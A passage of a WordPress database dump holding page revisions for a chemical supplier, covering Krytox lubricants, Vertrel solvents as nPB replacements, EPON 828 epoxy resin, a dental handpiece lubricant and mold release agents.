Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-10-14 01:55:41', '2016-10-14 01:55:41', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2641, 2, '2016-10-14 16:50:39', '2016-10-14 16:50:39', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-10-14 16:50:39', '2016-10-14 16:50:39', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2642, 3, '2016-10-14 19:11:56', '2016-10-14 19:11:56', 'Why are Vertrel fluids a suitable replacement for nPB?\r\n\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB. <a href="https://www.miller-stephenson.com/chemicals/solvents/opteon-solvents/">Opteon™ products</a> are also a great replacement for nPb.\r\n\r\n<img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" />\r\n\r\n[ux_product_categories ids="232,231" number="10"]', 'Why Vertrel specialty fluids are a suitable replacement for N-propyl bromide and Trichloroethylene', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-10-14 19:11:56', '2016-10-14 19:11:56', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2643, 2, '2016-10-14 19:47:41', '2016-10-14 19:47:41', 'EPON 828 resin is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. When cross-linked or hardened with appropriate curing agents, very good mechanical, adhesive, dielectric and chemical resistance properties are obtained. Because of this versatility, EPON Resin 828 has become a standard epoxy resin used in formulation, fabrication and fusion technology. Benefits include:\n<ul>\n 	<li>Fiber reinforced pipes, tanks and composites</li>\n 	<li>Tooling, casting and molding compounds</li>\n 	<li>Construction, electrical and aerospace adhesives</li>\n 	<li>High solids/low VOC maintenance and marine coatings</li>\n 	<li>Electrical encapsulations and laminates</li>\n 	<li>Chemical resistant tank linings, flooring and grouts</li>\n 	<li>Base resin for epoxy fusion technology</li>\n</ul>\nEPON™ liquid epoxy resins are the most important products sold in the epoxy resin market, and one of the foundations of Hexion. The basis of the product line is EPON Resin 828, which is a liquid resin also described as diglycidyl ether of Bisphenol A. This key resin is complemented in the range by EPON Resin 862, the diglycidyl ether of Bisphenol F, and a full series of modified liquid epoxy resins, epoxy resin blends and purified epoxy resins.\n3\n<strong>Application</strong>\n\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing.', 'EPON™ 828', 'EPON™ Resin 828 is an undiluted clear difunctional bisphenol A/epichlorohydrin derived liquid epoxy resin. When cross-linked or hardened with appropriate curing agents, very good mechanical, adhesive, dielectric and chemical resistance properties are obtained. Because of this versatility, EPON Resin 828 has become a standard epoxy resin used in formulation, fabrication and fusion technology. Benefits include:\n<ul>\n 	<li>Fiber reinforced pipes, tanks and composites</li>\n 	<li>Tooling, casting and molding compounds</li>\n 	<li>Construction, electrical and aerospace adhesives</li>\n 	<li>High solids/low VOC maintenance and marine coatings</li>\n 	<li>Electrical encapsulations and laminates</li>\n 	<li>Chemical resistant tank linings, flooring and grouts</li>\n 	<li>Base resin for epoxy fusion technology</li>\n</ul>', 'inherit', 'closed', 'closed', '', '877-autosave-v1', '', '', '2016-10-14 19:47:41', '2016-10-14 19:47:41', '', 877, 'https://www.miller-stephenson.com/877-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2644, 3, '2016-10-15 16:15:48', '2016-10-15 16:15:48', '<h2><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h2>\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\n\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\n\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\n<h3><strong>Product Description</strong></h3>\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\n\n<ul>\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\n</ul>\n[ux_product_categories ids="12" number="10"]\n\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-autosave-v1', '', '', '2016-10-15 16:15:48', '2016-10-15 16:15:48', '', 1128, 'https://www.miller-stephenson.com/1128-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2645, 3, '2016-10-15 16:16:00', '2016-10-15 16:16:00', '<h2><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h2>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-15 16:16:00', '2016-10-15 16:16:00', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2646, 3, '2016-10-15 16:31:42', '2016-10-15 16:31:42', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-15 16:31:42', '2016-10-15 16:31:42', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
